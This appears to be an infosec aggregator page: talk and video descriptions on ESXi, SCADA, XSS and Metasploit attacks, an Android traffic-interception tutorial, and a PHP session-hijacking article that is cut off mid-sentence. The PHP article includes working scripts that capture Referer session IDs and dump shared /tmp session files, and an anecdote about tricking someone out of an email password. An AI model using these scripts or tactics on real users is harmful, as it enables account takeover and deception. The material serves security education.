Esxi Beast Description: ESXI BEAST Exploiting VMWARE ESXi Binary Protocols Using CANAPE This presentation will cover a demonstration of the new version of the Canape protocol analysis tool being released for Ruxcon. During the course of the presentation various attack scenarios against the VMWare ESXi binary protocol will be demonstrated using Canape. The VMWare ESXi protocol is a complex multi-layered protocol which transitions between many protocol states throughout a connection lifetime. The protocol uses multiplexed frames, compression and encryption all over a single TCP connection. The talk will discuss and outline serious weaknesses within the ESXi protocol and how these can be leveraged from within Canape. During the talk, new features of Canape will be demonstrated live to show the audience how the tool can be used from traffic interception and initial protocol dissection through data injection and fuzzing and finally demonstrating full PoC exploitation all within Canape. Presentation outline: What is Canape Examining the VMWare ESXi protocol Demonstrating ESXi protocol interception Intercepting the ESXi encryption Data injection to brute force user credentials Fuzzing ESXi 0day demonstration Questions Testing and exploiting binary network protocols can be both complex and time consuming. More often than not, custom software needs to be developed to proxy, parse and manipulate the target traffic. Canape is a network protocol analysis tool which takes the existing paradigm of Web Application testing tools (such as CAT, Burp or Fiddler) and applies that to network protocol testing. Canape provides a user interface that facilitates the capture and replaying of binary network traffic, whilst providing a framework to develop parsers and fuzzers. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Esxi Beast

Scada Strangelove Description: SCADA STRANGELOVE or: How I Learned to Start Worrying and Love Nuclear Plants Modern civilization unconditionally depends on information systems. It is paradoxical but true that ICS/SCADA systems are the most insecure systems in the world. From network to application, SCADA is full of configuration issues and vulnerabilities. During our report, we will demonstrate how to obtain full access to a plant via: a sniffer and a packet generator FTP and Telnet Metasploit and oslq a webserver and a browser About 20 new vulnerabilities in common SCADA systems including Simatic WinCC will be revealed. Releases: modbuspatrol (mbpatrol) – free tool to discover and fingerprint PLC Simatic WinCC security checklist Simatic WinCC forensic checklist and tools close to real life attack scenario of a Simatic WinCC based plant Intro 1.1 Who we are? 1.2 History of research Overview of ICS/SCADA architecture SCADA network puzzle 3.1 Overview of protocols used in SCADA networks 3.2 Modbus overview 3.3 S7 overview 3.4 Modbus/S7 SCADA/PLC fingerprint (release mbpatrol - free tool for PLC fingerprint) Who is mister PLC? 4.1. Typical PLC architecture 4.2. Security and configuration issues 4.3. Coordinated disclosure of vulnerabilities in several PLC DEMO. Owning plant with ftp and telnet. During demo, I will demonstrate how several vulnerabilities and configuration issues of PLC can be used to get root access to the device, install rootkit and manipulate something in real world. Miss SCADA 6.1. Place of OS and DB in security of SCADA infrastructure 6.2. Simatic WinCC default configuration issues 6.3. Ways to abuse OS and DB vulnerabilities 6.4. Coordinated disclosure of several OS/DB WinCC vulnerabilities 6.5. Simatic WinCC security checklist 6.6. Simatic WinCC postexploitation/forensic Heavy weapon 7.1. SCADA/HMI application architecture (based on Simatic WinCC) 7.2. Clients-side in SCADA network? (release of client-site fingerprint tool for HMI software) 7.3. Coordinated disclosure of vulnerabilities in Siemens Simatic WinCC 7.0 used in exploit. Architecture of exploit DEMO. Owning plant with browser. Exploit scenario. Several 0-day (but responsible disclosed) vulnerabilities in Siemens Simatic WinCC 7.0 used to: Fingerprint presence of WinCC client software Obtain access password to WinCC WebNavigator interface Read registry and files on WinCC box View and manage HMI /PLC/technological process from internet via browser of operator 10 PS. Why physical separation is not enough Will we tell about 0-day vulnerabilities? Yes, but we will coordinate with vendor. So list of vulnerabilities depended on patching speed of Siemens. Will instruments be presented? 29C3: SCADA Strangelove Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Scada Strangelove

Owasp Xenotix Xss Exploit Framework 2012 V2 Description: Features of Xenotix XSS Exploit Framework Built in XSS Payloads XSS Key logger XSS Executable Drive-by downloader Automatic XSS Testing XSS Encoder XSS Reverse Shell (new) Download: https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Owasp Xenotix Xss Exploit Framework 2012 V2

Post Exploitation - System Information Gathering Description: In this video I will show you how to use Interesting Post – Exploitation Modules for Windows. So I’m going to use four Post – Exploitation Modules. 1 post/windows/gather/enum_applications This module will Dump All the list of Installed Application With Versions. 2 post/windows/gather/usb_history This Module will show you victims USB_History. 3 post/windows/gather/enum_devices This module for Enumerating Hardware. 4 post/windows/gather/enum_chrome This module is very interesting – using this module you will get all the information about chrome browser – Information like, Web Data, Coockie History, Login Data bookmarks, Preferences etc .. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Post Exploitation - System Information Gathering

Hackers As A High-Risk Population Description: HACKERS AS A HIGH-RISK POPULATION Harm Reduction Methodology Hackers are a high-risk population. This talk will provide hackers with tools to reduce the risk to themselves and their communities using harm reduction methodology. Hacktivism, social networks, hacking’s learning opportunities, grey area use of communication tools by revolutionaries and countermovements, information transparency opportunities, privacy and security abuse and user risk situations all share one central tension: resolving ethical decisions around potentially harmful behavior. At the same time, those who confuse information with advocacy perceive much of what we do – and discuss – as dangerous. This talk will provide hackers with tools to reduce the risk to themselves and their communities. We’ll examine the similarities between extreme risk populations and the risk / harm situations hackers find themselves in – especially those with exceptional access, power or talent. Importantly, I’ll explain how the controversial – yet effective – harm reduction model can be used specifically as a tool for at-risk hackers, and those faced with decisions that may result in perceived or actual harm. The talk begins with an overview of harm reduction and its roots in reducing risk in European drug culture. We’ll also look at how it is currently used hands-on in the US by urban activists/educators/crisis volunteers such as myself to effectively educate and reduce risk in high-risk, typically underserved, populations. Threaded throughout the talk is the idea that informed consent practices and the acceptance that harmful behavior is immutable can be effective tools to solve ethical decisions. Used on a wider scale, harm reduction in this light can be used to change the cultural conversation when black vs. white solutions (“just say no,” jailing those who publish information or “real names” policies) are unsuccessfully applied to complex problems (drug abuse, abusive use of information, using pseudonyms for harm). We’ll examine instances in which harm reduction would minimize damage (including the “gentleman’s agreement” between hackers), and failures when harm reduction could have mitigated failure or worse. We will specifically look at harm reduction as applied to hacktivism, social networks, hacking’s learning opportunities, grey area use of communication tools by revolutionaries and countermovements, information transparency opportunities, privacy and security abuse, and user risk events. For over a decade I have taught harm reduction methodology and practice in San Francisco, California to global health students, nurses, doctors, outreach and clinic workers, counselors and therapists. The primary organization I do this with is a twice-yearly training for healthcare professionals so they are able to treat populations on the fringes and who live in danger. Additionally, I have instructed and applied harm reduction methods to volunteer work I’ve done to bridge homeless and at-risk youth with neighborhood residents to foster safer quality of life. The third arena in which I instruct and apply harm reduction is a twice-yearly live-action, on-site refugee crisis simulation lead in conjunction with UCSF’s Global Heath Program in which volunteers for [NGO] organizations such as Doctors Without Borders and Red Cross are intensely prepared for emergency refugee relief events. It is with all this work that I see the lens with which the HR methods can seriously benefit the edge-case and high-risk scenarios hackers often find themselves in. PDF : - http://events.ccc.de/congress/2012/Fahrplan/attachments/2228_Harm%20Reduction Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Hackers As A High-Risk Population

Sniffing Network Traffic on Android Dejan Lukan December 31, 2012 Introduction There has been a lot of talk about how to connect your laptop though the Android network and use the bandwidth that you’re already paying for. Usually, this requires setting up an access point on an Android device and connecting to it with the laptop. On some devices you have to root the phone to be able to do that, but on newer devices this functionality is already included in the Android itself and we don’t even need to install a special application anymore. All we need to do is configure the access point in settings and connect to it. In this article we won’t talk about how to connect your laptop to the Android access point, but rather the opposite. We’ll be connecting the Android device to the laptop-enabled access point. But why would we do that? The main reason is not related to using the network over the phone (quite the contrary: the laptop should have a valid Internet connection already). We’re doing it because we want to sniff everything the Android device sends and receives over the network. There are a couple of ways to achieve that. One of them is to set a specific application to use a proxy, but the application has to support that setting, and most of them don’t. Another option is to use a system-wide proxy, so all Internet communication goes through it, but that method isn’t as reliable as the option we’ll be using. We’ll set up an access point on our laptop and connect to it via the mobile phone. We need to be aware that there are other options for sniffing the traffic from the Android device, like changing the IP tables on the phone, but they all require a rooted phone, which we don’t want. We want to use the Android device without rooting it and blowing our warranty. Option 1: Changing the Proxy Settings The first thing we need to do when trying to sniff the communication of the specific application on the Android is to connect the Android phone and a laptop to a local area network. This way, both devices will obtain the IP address from the same local host network. In our case we’re going to use the IP address range 192.168.1.0/24. Additionally, we also have to set-up a Burp proxy on our laptop, so we’ll be able to intercept requests made by the Android phone. To set up Burp, we must first download it and start it; it should automatically start listening on a predefined port, which is 8080. If this port is already in use it will use another port, but it doesn’t really matter which port it chooses right now, because we’re going to configure it ourselves anyway. First, let’s start up Burp and check if it starts to listen on the appropriate port. We can do that with the use of the netstat command in Linux. The actual command we have to run is shown below: # netstat -landtp | grep java tcp6 0 0 127.0.0.1:8080 :: LISTEN 31 We can see that Burp is listening on the default predefined port 8080, but there’s also one interesting thing; it’s listening on 127.0.0.1 address. This is the local host address, so the Android device, which has a different IP, won’t be able to connect to it. We need to configure Burp to use global IP address 0.0.0.0, which is used to listen for traffic on all interfaces, not just the local host lo interface. In order to do that, we must go to Proxy–Options under Burp, which will look like the picture below: We can see that Burp is successfully listening on the port 8080, as we already saw. There’s also a check in the loopback only option. This is exactly the option we need to disable. First, we must stop the proxy on port 8080; we can do this by clicking on the check box icon in the running column. After that the Burp proxy will stop and we will be able to load the configuration by clicking on the button edit. The configuration options will then look as follows: Now we must disable the “listen on loopback interface only” option and click on the update button. Burp will then ask us if we really want to start listening on all interfaces and we must press yes. Then we must restart the Burp proxy by enabling it in the running column. The Burp proxy should then be listening on all interfaces, which means we’ll be able to connect to it from the Android phone. Let’s check if the Burp proxy is really listening on all interfaces, with the same netstat command we already used. The output of the command is shown below: # netstat -landtp | grep java tcp6 0 0 :::8080 :: LISTEN 3 Great, Burp is now listening on port 8080 on all interfaces. Remember that you can as easily change the port to a number of your liking, so you don’t have to use 8080 if you don’t like or if you already have some other service listening on that port. Now we need to configure our Android phone to use a proxy. We can do that by changing the settings of the network we’re already connected to. In order to that that, we need to open the Wireless settings and enter the advanced options for the currently connected network. After that we’ll be able to see the “Proxy settings,” where we need to select “Manual”. Then we need to enter the IP address of our laptop computer and the port 8080 we configured Burp to use. Then save the settings. After that we can start any application we want and, if we’re lucky, some packets will start flowing through Burp. We first started the Gmail application, but it didn’t work. This is because some applications don’t honor the proxy being set in the network settings, so it doesn’t really work for all applications, but it does for some. Next we started an application that we won’t mention by name, and we received some traffic in Burp. The traffic can be seen on the picture below: Cool. The first four packets are being sent because the application uses advertisements that are being downloaded from Google servers. And the last packet is actually the application-specific packet that sends a score of some kind on the server. We are also beginning to understand the API interface that the application uses to expose its features to the clients. We can also see the headers that are being generated when the GET request is being sent over the network. This is all right, but so what? We can only sniff HTTP protocol and it only works for some applications, while we can’t sniff the traffic being sent by other applications. You might say that this is lame, but it actually isn’t; later we’ll talk about techniques which we can use to sniff the HTTP traffic from every application out there, no matter which API functions it uses to bypass the proxy settings. Wait, isn’t Burp able to intercept the HTTP and HTTPS traffic? So why are we only able to intercept HTTP traffic? Yes, Burp is able to intercept both clear text HTTP protocol and encrypted HTTPS protocol. The idea is that, when an application on Android tries to use the HTTPS, it first checks the certificate chain, which must be signed by the trusted certificate authority to be able to continue. For example: if we visit some HTTPS link in the Opera web browser, the web browser will display a warning saying that the web site is using a certificate that can’t be trusted and give us the choice to choose whether we would like to continue browsing or cancel the request. If we continue browsing, we’re essentially trusting the invalid certificate, which means in such cases that we’ll be able to intercept traffic using the encrypted HTTPS protocol. But this is a web browser, which should ask the users of they want to continue browsing, because a lot of web sites today use non-signed certificate that can be trusted. Thus we need to be able to continue browsing. But this isn’t so easy with various other applications. What if some web application is trying to send a GET request through the encrypted HTTPS protocol using some API function call that’s natively supported by the Android? Well, in such cases, that function doesn’t have the means to ask the user if he wants to trust the certificate or not; it just succeeds or fails, depending on how the applications was programmed to behave. If the function call accepts the invalid non-signed certificate, then everything will still work and we will be able to intercept traffic through HTTPS; but the default option is to not trust the non-signed certificate and most applications use the default option. Why would anyone enable the less secure non-default option that, first of all, isn’t secure and, second of all, requires more work? There’s only one reason: the programmer of that application doesn’t want to pay for the trusted certificate, but he still wants to send all the data over the encrypted HTTPS tunnel. But really, how many Android programmers like that are out there? Not many, which is why most of the applications will have default settings that reject the invalid non-signed certificate immediately. Therefore, we can conclude that intercepting the HTTPS traffic for most applications will be a little more difficult that just using a proxy. Option 2: Adding the Burp’s CA Certificate In the previous section we said that HTTPS intercepting is possible in some applications, but we can’t intercept the traffic successfully, because Burp presents a non-signed certificate to the application. Since the default behavior doesn’t allow the application to use non-signed certificate, those errors will cause the application to fail and the requests will not be sent over the encrypted HTTPS tunnel. Here we’re going to extract the CA self-signed certificate that Burp uses from Burp and add it to the Android’s certificate store. This way, we’ll force the Android system to trust that certificate and connect to Burp without alerting the user about certificate not being trusted. The CA certificate is regenerated every time we restart Burp. Every time we make an encrypted connection to some host on the internet, Burp then generates another server certificate and signs it with the previously created CA certificate. Thus, if we add the CA certificate to the certificate store on the Android device, the connection to Burp will be trusted and we will also be able to intercept HTTPS traffic between android device and target web application. First we have to export the CA certificate from Burp. We can do that by first setting up the proxy in Firefox or some other browser and then visiting an HTTPS-enabled web site. At that point, the web browser will present a warning notifying us that the certificate is not trusted. We need to add exception for that certificate and export it at the same time. To export the certificate, we must view the details of the certificate, which can be seen in the picture below: We can see that we selected the PortSwigger CA certificate and exported it. If we save the certificate into the file PortSwiggerCA and output its contents, we will get something like this: # cat PortSwiggerCA -----BEGIN CERTIFICATE----- MIICxDCCAi2gAwIBAgIEUI2pETANBgkqhkiG9w0BAQUFADCBijEUMBIGA1UEBhML UG9ydFN3aWdnZXIxFDASBgNVBAgTC1BvcnRTd2lnZ2VyMRQwEgYDVQQHEwtQb3J0 U3dpZ2dlcjEUMBIGA1UEChMLUG9ydFN3aWdnZXIxFzAVBgNVBAsTDlBvcnRTd2ln Z2VyIENBMRcwFQYDVQQDEw5Qb3J0U3dpZ2dlciBDQTAeFw0xMjEwMjgyMTUyMTda Fw0zMjEwMjMyMTUyMTdaMIGKMRQwEgYDVQQGEwtQb3J0U3dpZ2dlcjEUMBIGA1UE CBMLUG9ydFN3aWdnZXIxFDASBgNVBAcTC1BvcnRTd2lnZ2VyMRQwEgYDVQQKEwtQ b3J0U3dpZ2dlcjEXMBUGA1UECxMOUG9ydFN3aWdnZXIgQ0ExFzAVBgNVBAMTDlBv cnRTd2lnZ2VyIENBMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCoXLjIpRJh Sh/DbmhUCJErTgANPnoBBhfj97P6Gaya3BP+7NfzT670INyK2o5iS3FtSI78OZJ1 Sjgmg1jpycSqAPuOWS76kqrLiu+FaMAIAzYfIbei68wnPEAIflIA5AQpbSd5A4eF ldOhRYTz5VfTJxvy388KFkqHi6JD+lnSSQIDAQABozUwMzASBgNVHRMBAf8ECDAG AQH/AgEAMB0GA1UdDgQWBBTDazkycGJQkgV6GdPacarqRrMISDANBgkqhkiG9w0B AQUFAAOBgQCiLCy7AQHpWLq1W2DANmrybMmSUFXqcOMZei/xb/61LS4NjoVIQ4Fm 1OWLSJX/t00P+fS0Xk/5+vnWgIE+WP8Z9l6eWzNu/7EU6GCm1vECZ2X+XycD8wgB hZv17D+I0mFcHJFQtgq2sranJ+7oITkXOhcpwJ2+6+aTPDoUkp2AlQ== -----END CERTIFICATE----- This is the CA certificate that we need to import into the Android certificate store. To do that, we need to connect the phone to our system and copy the certificate to SDCARD on the Android phone. We can do that with the command below: # adb push PortSwiggerCA /sdcard/ 22 KB/s (1038 bytes in 0.045s) The CA certificate will then be stored in the SDCARD on the Android phone. To add it to the certificate store, we need to go to Preferences–Security and select “Install from device storage”. When clicking on that entry, it will say that there is no valid certificate present on the SDCARD. But how is that possible? We just pushed the certificate from our computer to the SDCARD. The problem is that this process looks only for the file extensions to find the certificates and we pushed the default certificate to the SDCARD without the file extension. To bypass that limitation, we need to save the certificate as PortSwiggerCA.crt, push it to the Android SD card again and rescan the storage device. Now the CA certificate is found and we can simply import it into the certificate store by clicking on OK button. The process will then open a Toast message saying that the PortSwiggerCA certificate was successfully installed. After that, we can start a web browser and try to visit an HTTPS-enabled web site. Upon opening the HTTPS URL, the Android will be able to verify the trust of the certificate presented by Burp and the web site will open normally. Additionally we will be able to see all the HTTPS traffic flowing through the internet in a Burp proxy. Since Burp creates a new CA certificate every time we restart it, it’s way better to create a new CA certificate manually, load it into Burp and also onto the Android device; then we will always be able to intercept HTTPS traffic as long as Burp will use the created CA certificate. We can follow the instructions presented here [1] to create the CA certificate manually. Basically, we need to execute the following commands to create the CA certificate: # openssl genrsa -des3 -out ca.key 4096 # openssl req -new -x509 -days 1000 -key ca.key -out ca.crt This will create the CA certificate named ca.crt, which we need to import into our Android device. We can push it into the SDCARD as we did before and add it to the certificate store. By doing that we will be able to sign any server certificate with our CA certificate and the Android device will always trust the server certificate, because it trusts the CA certificate. Next, we also need to create the server certificate signed by the previously created CA certificate, which we’ll be using in Burp. To do that we must execute the commands below, again taken from [1]: # openssl genrsa -des3 -out server.key 4096 # openssl req -new -key server.key -out server.csr # openssl x509 -req -days 1000 -in server.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out server.crt # openssl pkcs12 -export -out server.p12 -in server.crt -inkey server.key The certificate will be stored in a file named server.p12, which is the server certificate we need to configure Burp with (signed by the previously created CA certificate). To configure Burp to use that certificate, we must open Proxy–Options and configure the “server SSL certificate” options as shown in the picture below: Of course, we must also provide the password for the server certificate. The important thing we need to remember is the Common Name (CN) that we used when creating the server certificate. It is only that domain that we’ll be able to sniff without the warning message that the certificate is not valid. So why did we go through the hassle of creating our own certificates if we still need to recreate the server certificate and import it into Burp for each domain in the testing scope? The answer is quite simple: because we don’t need to recreate the CA certificate every time. We created the CA certificate, imported it into the certificate store on an Android phone and now our system trusts every server certificate, which is signed by that CA certificate. This is why we don’t ever need to transfer another CA certificate to the phone and install it; all we need to do is create another server certificate with appropriate CN on our computer and configure Burp to use it. All we need to do from now on is to create a new server certificate for the domain we would like to test, sign it with the CA certificate, and import it into Burp. We don’t need to configure anything else on the Android. If we’re going to extensively sniff HTTP/HTTPS traffic from the Android device, it’s better to set up AndroidProxy, which is a program that sits between the Android device and our Burp proxy and makes it easy to intercept HTTPS traffic by sending the domain name instead of the IP address to our proxy. It does this by intercepting all DNS requests and rewriting the CONNECT command, passing the domain name to it, rather than IP address. This should be done before the requests reach the Burp proxy, which uses the CONNECT directive to associate the correct IP address with the DNS hostname. A picture taken from the homepage of the AndroidProxy project on the Google Code, which explains this a little further, is presented below: Option 2: Using a Linux Access Point We’ll be setting up the access point via the hostapd wireless host AP daemon. First we need to install it via our default package manager on the Linux system. The hostapd daemon adds a configuration file /etc/hostapd/hostapd.conf, which contains the default configuration variables shown below: # cat /etc/hostapd/hostapd.conf | grep -v ^# | grep -v ^$ interface=wlan0 logger_syslog=-1 logger_syslog_level=2 logger_stdout=-1 logger_stdout_level=2 dump_file=/tmp/hostapd.dump ctrl_interface=/var/run/hostapd ctrl_interface_group=0 ssid=test hw_mode=g channel=1 beacon_int=100 dtim_period=2 max_num_sta=255 rts_threshold=2347 fragm_threshold=2346 macaddr_acl=0 auth_algs=3 ignore_broadcast_ssid=0 wmm_enabled=1 wmm_ac_bk_cwmin=4 wmm_ac_bk_cwmax=10 wmm_ac_bk_aifs=7 wmm_ac_bk_txop_limit=0 wmm_ac_bk_acm=0 wmm_ac_be_aifs=3 wmm_ac_be_cwmin=4 wmm_ac_be_cwmax=10 wmm_ac_be_txop_limit=0 wmm_ac_be_acm=0 wmm_ac_vi_aifs=2 wmm_ac_vi_cwmin=3 wmm_ac_vi_cwmax=4 wmm_ac_vi_txop_limit=94 wmm_ac_vi_acm=0 wmm_ac_vo_aifs=2 wmm_ac_vo_cwmin=2 wmm_ac_vo_cwmax=3 wmm_ac_vo_txop_limit=47 wmm_ac_vo_acm=0 eapol_key_index_workaround=0 eap_server=0 own_ip_addr=127.0.0.1 We can see that we’re used the wlan0 interface on the channel number 1 and the SSID access point name is test. Start the hostapd: # /etc/init.d/hostapd start * Caching service dependencies ... * Service `hostapd' needs non existent service `net.wlan0' * ERROR: hostapd needs service(s) net.wlan0 To bypass this error we need to symling the net.lo to the net.wlan, because the above error message said that the net.wlan0 doesn’t exists. This way we can simply bypass the above check. To create the symbol, execute this command: # ln -s /etc/init.d/net.lo /etc/init.d/net.wlan0 Afterwards we need to start the net.wlan0, which we can do with the following command: # /etc/init.d/net.wlan0 start * Bringing up interface wlan0 * Starting wpa_supplicant on wlan0 ... * Starting wpa_cli on wlan0 ... * Backgrounding ... ... * WARNING: net.wlan0 has started, but is inactive Okay, the wlan0 interface card is inactive., Hmmmm … why? It’s because we haven’t edited the /etc/conf.d/net yet and added the appropriate settings for the wlan0 interface card. We need to add something as follows to the /etc/conf.d/net configuration file: modules_wlan0=( "!iwconfig !wpa_supplicant" ) config_wlan0=( "10.1.2.1 netmask 255.255.255.0" ) Then we can restart the wlan0 init script, which can be done with the command below: # /etc/init.d/net.wlan0 restart * Caching service dependencies ... * Bringing down interface wlan0 * Removing addresses * Stopping wpa_cli on wlan0 ... * Stopping wpa_supplicant on wlan0 ... * Bringing up interface wlan0 * You are using a bash array for config_wlan0. * This feature will be removed in the future. * Please see net.example for the correct format for config_wlan0. * 10.1.2.1 ... SIOCSIFFLAGS: Operation not possible due to RF-kill * ERROR: net.wlan0 failed to start What’s happening? There was some error informing us that operation is not possible because of the RF-kill. If we install the rfkill program we can inspect the settings of wireless devices. First let’s list all available wireless devices: # rfkill list all 0: hci0: Bluetooth Soft blocked: no Hard blocked: no 1: phy0: Wireless LAN Soft blocked: yes Hard blocked: no The wireless card is soft blocked? This is probably the reason we’re getting the above error. To unblock the wireless card we can execute this command: # rfkill unblock all # rfkill list all 0: hci0: Bluetooth Soft blocked: no Hard blocked: no 1: phy0: Wireless LAN Soft blocked: no Hard blocked: no With the first command we unblocked all the wireless devices, but because only the wireless card was blocked, only the wifi was actually unblocked. Then we presented the wireless devices again; we can see that the wireless card isn’t blocked anymore, which is good. We can try restarting the wlan0 init script again. This time there are no errors and the net.wlan0 init script works fine, which can be seen below: # /etc/init.d/net.wlan0 restart * Bringing up interface wlan0 * You are using a bash array for config_wlan0. * This feature will be removed in the future. * Please see net.example for the correct format for config_wlan0. * 10.1.2.1 ... The wlan0 interface card now has the 10.1.2.1 IP set accordingly to the /etc/conf.d/net configuration file. We can display the information about the wlan0 interface card with the following command: # ifconfig wlan0 wlan0 Link encap:Ethernet HWaddr 00:26:c6:21:cf:1a inet addr:10.1.2.1 Bcast:10.1.2.255 Mask:255.255.255.0 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:47740 errors:0 dropped:0 overruns:0 frame:0 TX packets:48220 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:36288822 (34.6 MiB) TX bytes:12441625 (11.8 MiB) The inet addr says that the IP address is 10.1.2.1, which is correct, and the Mask is 255.255.255.0, which is also correct. The route in the routing table has also been correctly added: # route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 10.1.2.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0 We need to set up the DHCP server. We can do that by using the dnsmasq, which provides DHCP and DNS services. First we need to install and configure the dnsmasq. We won’t go into the installation part of the dnsmasq, as you can probably just install it with your default package manager. Then we need to start the DHCP server, which we can do simply by executing this command: # /etc/init.d/dhcpcd start * Caching service dependencies ... * Starting DHCP Client Daemon ... After that we can simply start hostapd, which will provide us with the access point we can connect to. When the mobile phone is connected to our AP, we simply need to forward the packets out to the internet and optionally intercept them. Probably the whole point of doing this is intercepting the data, which is why we probably will be intercepting the data. We won’t describe that here, because it’s out of the scope of the article, since we only wanted to show how to connect the phone in ways that we’re able to use for intercepting the traffic. Conclusion We showed various ways we can use to intercept the traffic from an Android phone on the computer, which allows us to inspect and modify the traffic. The easiest part is to sniff for the HTTP and HTTPS traffic, but most of the applications will use that, so we’re pretty much covered. The first thing to do when trying to intercept the traffic is to set the proxy in the application itself, if it supports one. Most of the time, the applications don’t support proxying, which is why we’ll need to set a global proxy on an Android phone. But some applications bypass the proxy, so we need different methods to still be able to intercept the traffic. One of them we briefly described (but didn’t provide too much detail) is to connect our phone to an arbitrary access point that we set up on our computer. That way all the traffic will be flowing through our AP upon connecting to it. Remember that those are just a few ways to intercept the traffic, but there are many other techniques as well. One of them is to set up a sniffer on the actual router and then connect the phone to our home router, which is quite elegant and easy solution. There is no unique recipe how to intercept the data from the Android applications, but it can be done as we showed above. References: [1] Self-signed Certificates in Burp, accessible on un-excogitate.org

PHP Session ID’s – The Risks Adrian Stolarski December 31, 2012 In today’s article I want to address a very important topic. Namely, I want to talk about PHP session security. I know and understand that this is a very broad topic, but is also extremely interesting. PHP, even though it is simple and intuitive, is considered bad language if you want to write any halfway complex software. Why is that? The fault lies not with the language itself, but the programmers and administrators who do not understand it. This article will show you how to attack a session mechanism. Use browsers weakness PHP generally has two options for the transmission of session IDs. Both of them are very interesting from our point of view. The first is to transfer the session identifier in the address, so the session ID is then available to the public. The second way is a much safer route, and it is to use cookies. Although it may be safer to use a cookie, it does not give you 100% security. Well, what happens when you’re on my side, and I’ll start to collect all the information of your cookies? All cookies, which are generated by visiting your favorite web sites, such as logging into the post office or a paid service? For me, the first solution is interesting and shows the lack of creativity of developers and administrators of the servers on which PHP is installed. The understanding of the written code can be very difficult though. The first method is to simply transfer session using the GET array. Here is an example: Example Domain b537a69ac366e85208de Beautiful, is it not? Do you know why it is still used? Many developers and administrators are afraid that users will block their browsers ability to receive cookies. It is responsible for the session.use_trans_sid option in php.ini. You know what risks it brings? With redirection, most browsers use this header: Referrer: Google Of course this is just an example. The contents of the header may be different, but it’s actually irrelevant. In the header, all the information about the previously visited site is transmitted. This header is sent only when we move to another page by clicking a link, rather than typing the address in your browser. Do you have a page where pop up ads always display in your browser? It annoys me like heck. I cannot look at them. What do I do? Buy a crafted link to my website on your website. Of course, I do side with a high click-through rate. My beautiful site will also contain a one very malicious script. Here’s the code: <?php if(isset($_SERVER['HTTP_REFERER'])){ $file=fopen("devilishchuckle.txt", "a"); fputs($file, $_SERVER['HTTP_REFERER']."\r\n"); fclose($file); } ?> The operation of a hacker script is as follows. $ _SERVER Is a superglobal command. First, we look at whether it initiated HTTP_REFERER as part of the $ _SERVER, then open the specified file, save and close the file. Beautiful and how easy to use. This can be compared to the iPhone and rotten apples. Everyone clicks on the link, it automatically will give your session id to the hacker, and the hacker will be able to log in as that person and destroy the credibility of the portal. Social engineering This is something that neither that is not immune to neither methods. Social engineering is described in the following articles: InfoSec Institute Resources – Social Engineering – We Start Playing InfoSec Institute Resources – Social Engineering 2—What Do We Have To Watch? How does this relate to PHP? Describe two stories, both show the extent of human stupidity and never be disappointed. Both have happened. Here they are: The first corresponds exactly to that of the writing. Once I managed to persuade someone to do something for me, nothing major, such as logging on to your e-mail account, and then send me the URL and your browser cookies. Then I showed that person what you can do with the data, which is willingly given. It was ridiculously easy. The other one is even more humorous. Once I entered the chat and pretended to be a lady, I got into a conversation with a desperado. He wanted a photo. I ordered him to give me an e-mail address. The guy did it without any resistance. I then waited for him to send me a photo. Then I asked why it had not come. I figured that mine crashes, it’s a mistake, and that he must give me the password to his e-mail address, and I will write to him from there. The first thing I did was to hurry and change his password to the e-mail. Sometimes it is exciting that we give their personal details to other strangers. However, I always try to verify the identity of people and do not give away precious private information to strangers. This is the principle, which is always observed. The possibility of session hijacking, having access to the server There is another thing that we must remember. If we have our website on a public server, where we are never alone, in addition to the normal users, public servers are filled with bad, lazy hackers. If the administrators are lazy, it can have serious consequences. Lazy administrators always leave something like a default PHP configuration set. That is the path to save the session. By default, PHP is /tmp, the location of which is really somewhere all users can read. It is enough that this lists the directory, but you can also view the session IDs. If we host the website in a large server, if known, will surely have a lot of sites hosted on it. This way, we can get a really large number of session IDs. Now, how to find the ones that interest us? Believe me, you do not have to use the same session ID. In a very simple way you can pull data from each session. define("SESSION_DIR", "/tmp/session/"); // session dir define("START", 5); // need to substr, the number of sessions depends on the name define("END", 32); // need to substr, the number of session depends on the name if(!isset($_GET['id'])){ $directory = opendir(SESSION_DIR); while($files=readdir($directory)){ $files = substr($files, START, END); echo "<a href=\"session.php?id=".$files."\">".$files."</a><br>"; } } else { session_id($_GET['id']); session_start(); foreach($_SESSION as $variable => $value){ echo $variable."=".$value."<br>"; } $directory = opendir(SESSION_DIR); while($files = readdir($dir)){ $files = substr($files, START, END); echo "<a href=\"session.php?id=".$files."\">".$files."</a><br>"; } } ?> As you can see our hacker script is very simple, yet very useful. It displays all session IDs. When you click on the ID, it shows us the data from the session id. Of course, that can also be defended. What is the fastest way to do so? Well, we can always change the path of data recording session, to a path that will be less available. However, just taking this step does not offset the risk as it exists as long as the user can list the directory. The next thing you should do is put each account in the Apache chroot or jail. This solution is also not the best as the amount of space that should be used varies. It is of course better idea to put set safe_mode to ON in php.ini. This way, no one will be able to be able to list the directory with the PHP sessions. Of course, we still have a problem with people who have shell accounts. Just remember that if I set the chmod, they also will not do too much. So how do we create a secure session id? In this article I strongly criticized mechanisms available in PHP sessions. This is still not the ultimate solution as to run completely secure. At the end of this article I want to show an alternative way to generate session IDs in PHP. Perhaps it is not as powerful as the one that already is in PHP, but it sure is safer and much easier to use. The main difference in the class below will rely on the fact that the problem has been completely easy to gather the session ID. You can read more about passwords in the following article: InfoSec Institute Resources – Best Practices When Creating Passwords As a hash of the password, the data used browser and IP address data. As a result, the session ID is created, which completely avoids what is called the birthday problem. That is when the browser gives so much data that it is 